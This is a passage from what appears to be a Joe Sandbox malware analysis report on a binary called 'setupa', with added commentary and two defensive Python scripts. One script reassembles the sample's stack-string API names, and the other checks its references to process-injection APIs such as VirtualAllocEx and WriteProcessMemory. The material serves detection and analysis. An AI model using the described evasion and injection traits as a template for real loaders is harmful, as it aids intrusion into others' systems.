                                                                                                               • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                                                                              • String ID: .$3$MessoxWu$e$l$oxW$u
                                                                                                              • API String ID: 2780580303-3595077490
                                                                                                              • Opcode ID: 03e146ecaf3a1edfc9f424c540d651c7a8c67f3faa4cca24a572b445dab155df
                                                                                                              • Instruction ID: 6c5892a6700a6f936808c1982786841f2ec77d741f1142e2c5ecba9fef7854a3
                                                                                                              • Opcode Fuzzy Hash: 03e146ecaf3a1edfc9f424c540d651c7a8c67f3faa4cca24a572b445dab155df
                                                                                                              • Instruction Fuzzy Hash: 48116776B14710CAFB018FA2A8484AC3BB8BB48FC8B198439CE1D67B08DF78C545DB40

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$AddressFreeGlobalLoadMemoryProcStatus
                                                                                                              • String ID: .dll$el32$kern$usEx
                                                                                                              • API String ID: 994989557-3581339799
                                                                                                              • Opcode ID: 2d4a219a3fcb6b2857654e431c03e82994e30dc387f18776065826204c00a663
                                                                                                              • Instruction ID: fd593997ede1eb63b17b47046a07cf8367e0d1617a5d3de2b1f71fee5774a6a5
                                                                                                              • Opcode Fuzzy Hash: 2d4a219a3fcb6b2857654e431c03e82994e30dc387f18776065826204c00a663
                                                                                                              • Instruction Fuzzy Hash: 49113776B49B81DDEB11CF65E4103AC63A1FB98B84F48843DDE4D92B48EE38D258C794

                                                                                                              Control-flow Graph

                                                                                                               [Control-flow graph image not captured; the Executed / Not Executed colouring is not recoverable. From the graph data: the function at 7ff68972780c has entry block 7ff68972780c-7ff689727836 and terminal blocks ending at 7ff6897279a0 and 7ff689727b5c; it calls the subfunctions 7ff689646f28, 7ff689647ebe, 7ff689647fa4, 7ff6896441ec, 7ff689648e3b, 7ff6897a84f0, 7ff68964579a, 7ff689647086, 7ff6896435bc, 7ff689727528, 7ff68964847c, 7ff68964266c, 7ff689648ac6, 7ff6896459fc and 7ff689645ae7, calls itself from block 7ff689727b2b, and calls the API WideCharToMultiByte twice, in blocks 7ff6897278da-7ff689727916 and 7ff68972792c-7ff689727962.]
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide$InformationTimeZone
                                                                                                              • String ID: ?$Eastern Standard Time$Eastern Summer Time
                                                                                                              • API String ID: 1904278450-688781733
                                                                                                              • Opcode ID: 3605493d57d11c642bbfc623775cdb0dd30657c2ed1a5ad0856d88a304b95ca4
                                                                                                              • Instruction ID: dc4051b6ed9ca37f52dd252c24c0d4cfbbc2113c7be08d2b6f0ab9de4afda6c0
                                                                                                              • Opcode Fuzzy Hash: 3605493d57d11c642bbfc623775cdb0dd30657c2ed1a5ad0856d88a304b95ca4
                                                                                                              • Instruction Fuzzy Hash: 59617E32A18642CAF760DF61E9805A977A5FF48FD5F44013AEA4EC6A95DF3CE481CB40

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocErrorLastVirtual
                                                                                                              • String ID: Virt$lloc$ualA
                                                                                                              • API String ID: 497505419-1619206022
                                                                                                              • Opcode ID: 083f7b0d19613bb60fa680645b654152f973e887b00eecdd096ea0dff258c669
                                                                                                              • Instruction ID: 90c6a93064ec393e86d798d4861566cd70acd14f10b858747c77d1084823a645
                                                                                                              • Opcode Fuzzy Hash: 083f7b0d19613bb60fa680645b654152f973e887b00eecdd096ea0dff258c669
                                                                                                              • Instruction Fuzzy Hash: 0F118C22B05641D9FB209FB5D4003EE2771BF44B99F404239CA1CA7B99EF38D244C748

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExecuteLibraryLoadShell
                                                                                                              • String ID: dll$l32.$runa$shel
                                                                                                              • API String ID: 186556386-4073712556
                                                                                                              • Opcode ID: cc3b68a7b99cae8f412c900914edf99db2bfc8ce90aa8595becd14ee2b522169
                                                                                                              • Instruction ID: 8f4957533ce38e2e073832824d2dd48229ce0fb3b2fd5fc836652dba8510ee34
                                                                                                              • Opcode Fuzzy Hash: cc3b68a7b99cae8f412c900914edf99db2bfc8ce90aa8595becd14ee2b522169
                                                                                                              • Instruction Fuzzy Hash: 74112072B08A018EE310CFA0E4403AC73B6FB48788F804429DA4CA2A49DF78D258CB94
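The String ID fields of the four entries above (the LoadLibrary/GetProcAddress/MessageBox entry with ".$3$MessoxWu$e$l$oxW$u", the GlobalMemoryStatusEx entry with ".dll$el32$kern$usEx", the VirtualAlloc entry with "Virt$lloc$ualA", and the ShellExecute entry with "dll$l32.$runa$shel") do not contain whole API or DLL names, only 4-byte pieces of them. That is the signature of stack strings: the binary assembles the name at run time and passes it to GetProcAddress or LoadLibrary, so a plain strings scan or a string-based YARA rule for "VirtualAlloc" or "kernel32.dll" will miss this sample. Joe Sandbox prints the pieces sorted and joined with "$", not in assembly order. The script below is an added example, not part of the report, that reassembles the pieces against a dictionary of names a loader stub is likely to resolve; the dictionary is my assumption and should be extended with whatever the rest of the report shows. Pieces that cannot be assembled into a whole name are reported as hints (for instance "runa" beside a ShellExecute import is consistent with the "runas" verb, which requests elevation through UAC, but the listing does not prove it).

```python
"""
Added example, not part of the Joe Sandbox report: reassemble the chunked
API and DLL names found in the report's "String ID" fields.

Input format (as it appears in the report): the strings a function references,
sorted and joined with '$'. Because the order is sorted, not the order in which
the fragments are concatenated at run time, we search orderings of fragment
subsets against a dictionary of candidate names.
"""
from typing import Dict, List

# Assumed dictionary of names a loader stub commonly resolves. This is my
# assumption, not data from the report; extend it as the analysis progresses.
KNOWN_NAMES: List[str] = [
    "kernel32.dll", "user32.dll", "shell32.dll", "advapi32.dll", "ntdll.dll",
    "VirtualAlloc", "VirtualAllocEx", "VirtualProtect", "WriteProcessMemory",
    "CreateRemoteThread", "GlobalMemoryStatusEx", "LoadLibraryA", "LoadLibraryW",
    "GetProcAddress", "MessageBoxW", "ShellExecuteW", "runas",
]

# Constructed input: the four String ID fields quoted from this report.
REPORT_STRING_IDS: List[str] = [
    ".$3$MessoxWu$e$l$oxW$u",
    ".dll$el32$kern$usEx",
    "Virt$lloc$ualA",
    "dll$l32.$runa$shel",
]


def split_string_id(field: str) -> List[str]:
    """Split a '$'-joined String ID field back into its fragments."""
    return [piece for piece in field.split("$") if piece]


def assemble(fragments: List[str], candidates: List[str] = KNOWN_NAMES) -> Dict[str, List[str]]:
    """Return every candidate that can be spelled exactly by concatenating a
    subset of the fragments, each used at most once, in some order, together
    with the fragments in the order that spells it."""
    wanted = set(candidates)
    found: Dict[str, List[str]] = {}

    def dfs(current: str, path: List[str], used: int) -> None:
        if current in wanted and current not in found:
            found[current] = list(path)
        for i, frag in enumerate(fragments):
            if used & (1 << i):
                continue
            nxt = current + frag
            # Prune: keep extending only while some candidate still starts with nxt.
            if any(c.startswith(nxt) for c in candidates):
                dfs(nxt, path + [frag], used | (1 << i))

    dfs("", [], 0)
    return found


def analyze(field: str, candidates: List[str] = KNOWN_NAMES) -> Dict[str, object]:
    """Assemble what can be assembled; for leftover fragments of at least three
    characters, list candidates that merely contain them as weaker hints."""
    fragments = split_string_id(field)
    assembled = assemble(fragments, candidates)
    consumed = {frag for parts in assembled.values() for frag in parts}
    leftover = [frag for frag in fragments if frag not in consumed and len(frag) >= 3]
    hints = set()
    for candidate in candidates:
        if candidate in assembled:
            continue
        if any(frag in candidate for frag in leftover):
            hints.add(candidate)
    return {"assembled": assembled, "hints": sorted(hints)}


if __name__ == "__main__":
    for field in REPORT_STRING_IDS:
        result = analyze(field)
        print(f"{field!r}")
        for name, parts in result["assembled"].items():
            print(f"  assembled: {name}  <- {' + '.join(parts)}")
        for name in result["hints"]:
            print(f"  hint:      {name}")
```

On the report's own fields this yields VirtualAlloc, kernel32.dll and shell32.dll as exact assemblies, with GlobalMemoryStatusEx, runas and MessageBoxW as hints; the dictionary is the only tunable, and a detection that wants to be robust against this obfuscation should key on the API ID fields (which the sandbox derives from observed imports) rather than on strings.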

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                                • Part of subcall function 00007FF689646B1D: CreateJobObjectW.KERNEL32 ref: 00007FF689668279
                                                                                                                • Part of subcall function 00007FF689646B1D: GetLastError.KERNEL32 ref: 00007FF68966828D
                                                                                                                • Part of subcall function 00007FF68964243C: VirtualAllocEx.KERNEL32 ref: 00007FF689668647
                                                                                                                • Part of subcall function 00007FF68964243C: GetLastError.KERNEL32 ref: 00007FF689668662
                                                                                                                • Part of subcall function 00007FF689641717: WriteProcessMemory.KERNEL32 ref: 00007FF689668802
                                                                                                                • Part of subcall function 00007FF68964427D: SetInformationJobObject.KERNEL32 ref: 00007FF6896685B2
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00007FF6896661F6
                                                                                                                • Part of subcall function 00007FF689642EA0: AssignProcessToJobObject.KERNEL32 ref: 00007FF68966802A
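The APIs block above is the part of this report a responder cares about most: VirtualAllocEx followed by WriteProcessMemory is the remote-memory-write half of a process injection chain, and the surrounding CreateJobObjectW / SetInformationJobObject / AssignProcessToJobObject calls place a process into a job. Two caveats when reading it: the "Part of subcall function" lines are attributed to callees, so the listing is a flattened set of references rather than an execution trace, and this block shows no thread-creation or APC call, so the step that runs the written memory has to be found elsewhere in the report before the chain is called complete. The script below is an added example, not part of the report, that parses this listing and grades it against the allocate / write / execute stages; the line format is taken from the report as shown, and the stage-to-API grouping is mine.

```python
"""
Added example, not part of the Joe Sandbox report: parse the "APIs" listing of
a function entry and check it against the stages of a remote-write injection
chain.

Assumed line format (taken from the lines as they appear in this report):
    • <Api>.<MODULE> ref: <address>                                     direct call
    • Part of subcall function <address>: <Api>.<MODULE> ref: <address>  call made by a callee
The listing is a set of references, not an execution order, so it is treated
as a set.
"""
import re
from typing import Dict, List, Optional, Set

# Constructed input: the APIs block of the function entry quoted from this report.
SAMPLE_LISTING = """\
APIs
  • Part of subcall function 00007FF689646B1D: CreateJobObjectW.KERNEL32 ref: 00007FF689668279
  • Part of subcall function 00007FF689646B1D: GetLastError.KERNEL32 ref: 00007FF68966828D
  • Part of subcall function 00007FF68964243C: VirtualAllocEx.KERNEL32 ref: 00007FF689668647
  • Part of subcall function 00007FF68964243C: GetLastError.KERNEL32 ref: 00007FF689668662
  • Part of subcall function 00007FF689641717: WriteProcessMemory.KERNEL32 ref: 00007FF689668802
  • Part of subcall function 00007FF68964427D: SetInformationJobObject.KERNEL32 ref: 00007FF6896685B2
• GetCurrentProcess.KERNEL32 ref: 00007FF6896661F6
  • Part of subcall function 00007FF689642EA0: AssignProcessToJobObject.KERNEL32 ref: 00007FF68966802A
Strings
"""

LINE_RE = re.compile(
    r"(?:Part of subcall function (?P<via>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<module>\w+) ref: (?P<ref>[0-9A-Fa-f]+)"
)

# Stages of a remote-write injection chain and the APIs that implement each.
# The grouping is my assumption; the names are standard Win32 / NT APIs.
STAGES: Dict[str, Set[str]] = {
    "allocate": {"VirtualAllocEx", "NtAllocateVirtualMemory", "ZwAllocateVirtualMemory"},
    "write": {"WriteProcessMemory", "NtWriteVirtualMemory", "ZwWriteVirtualMemory"},
    "execute": {"CreateRemoteThread", "CreateRemoteThreadEx", "NtCreateThreadEx",
                "RtlCreateUserThread", "QueueUserAPC", "SetThreadContext"},
}
JOB_OBJECT_APIS: Set[str] = {"CreateJobObjectW", "CreateJobObjectA",
                             "SetInformationJobObject", "AssignProcessToJobObject"}


def parse_api_listing(text: str) -> List[Dict[str, Optional[str]]]:
    """Turn the listing into records with keys via (None for a direct call),
    api, module and ref; headers and unrelated lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            records.append(m.groupdict())
    return records


def assess(records: List[Dict[str, Optional[str]]]) -> Dict[str, object]:
    """Grade the referenced APIs against the injection stages and report which
    stages are missing from this listing, plus any job-object usage and the
    APIs grouped by the callee that references them."""
    apis = {r["api"] for r in records}
    stages = {name: sorted(apis & members) for name, members in STAGES.items()}
    missing = [name for name, hits in stages.items() if not hits]
    by_callee: Dict[str, List[str]] = {}
    for r in records:
        by_callee.setdefault(r["via"] or "direct", []).append(r["api"])
    return {
        "stages": stages,
        "missing": missing,
        "complete_chain": not missing,
        "job_object": sorted(apis & JOB_OBJECT_APIS),
        "by_callee": by_callee,
    }


if __name__ == "__main__":
    result = assess(parse_api_listing(SAMPLE_LISTING))
    for stage, hits in result["stages"].items():
        print(f"{stage:9s} {', '.join(hits) or '-'}")
    print("job object:", ", ".join(result["job_object"]) or "-")
    print("missing stages:", ", ".join(result["missing"]) or "none")
```

For this entry the result is allocate and write present, execute absent, with all three job-object APIs present; the by_callee grouping also shows each wrapper subfunction referencing exactly one primitive plus GetLastError, which is the pattern to look for when picking the thread-creation wrapper out of the remaining entries.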
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ObjectProcess$ErrorLast$AllocAssignCreateCurrentInformationMemoryVirtualWrite
                                                                                                              • String ID: GlideXClipboardxJob
                                                                                                              • API String ID: 147658365-2727544021
                                                                                                              • Opcode ID: 7cb3b5fe375f708b48daf5e3a82ba18d95056bcb5c822a5c054bcb50d7926c6d
                                                                                                              • Instruction ID: 243ac18fc586a2a4f97a90d113ac129356d71aec846dc4e1e4ba87e57516bbd3
                                                                                                              • Opcode Fuzzy Hash: 7cb3b5fe375f708b48daf5e3a82ba18d95056bcb5c822a5c054bcb50d7926c6d
                                                                                                              • Instruction Fuzzy Hash: 64315222B04941C1EA20AF52E4A10ED7760FFD5FD1F544236EA5E97BA6CF28D585DB00

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: 5781bc11684749c4696aa0ddf9a254fe49b282516b420466c1c6a8e00f95d53c
                                                                                                              • Instruction ID: 331baa4839185bbd85266ac5e492e32cf816604bfd4c0a35c39ba19cc52052bf
                                                                                                              • Opcode Fuzzy Hash: 5781bc11684749c4696aa0ddf9a254fe49b282516b420466c1c6a8e00f95d53c
                                                                                                              • Instruction Fuzzy Hash: 7B116736A08781CAE6609F56E8547AEB760FB88FC0F548139EE8D83745DF38D945CB40

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: 2fa483fc19e378228302cf4702eb302a93b4c0d94deb30604db21e839a7aa62c
                                                                                                              • Instruction ID: f9ea319406a6eba62fa32df8cb81805664ed450b1ed0fb41d5d2221ffaf93bfb
                                                                                                              • Opcode Fuzzy Hash: 2fa483fc19e378228302cf4702eb302a93b4c0d94deb30604db21e839a7aa62c
                                                                                                              • Instruction Fuzzy Hash: 5A01882AB10B91C2E710CF16A8086AD67A8FB98FC1F684279EF5893711CF38D542C740

                                                                                                               Control-flow Graph (graph image not preserved; nodes recovered from the page): 757 7ff68964350d-7ff68965dbf2 LoadLibraryA; 759 7ff68965dc06-7ff68965dc0b; 760 7ff68965dbf4-7ff68965dbff GetProcAddress; edges 757->759, 757->760, 760->759
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad
                                                                                                              • String ID:
                                                                                                              • API String ID: 1029625771-0
                                                                                                              • Opcode ID: ebb58982cea268ef58c051426426f058be4909e0bc52d214547d2cebb7a7e65f
                                                                                                              • Instruction ID: fd041eefe7420d40f7aef5d97b4c1693df13c48b53fde4137b6a3e57a28851e7
                                                                                                              • Opcode Fuzzy Hash: ebb58982cea268ef58c051426426f058be4909e0bc52d214547d2cebb7a7e65f
                                                                                                              • Instruction Fuzzy Hash: FCE048D6E49586C3FA594F55645527517C0EF26FD5E0C117CCA1C553C2DD2CE0D1D304
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmp
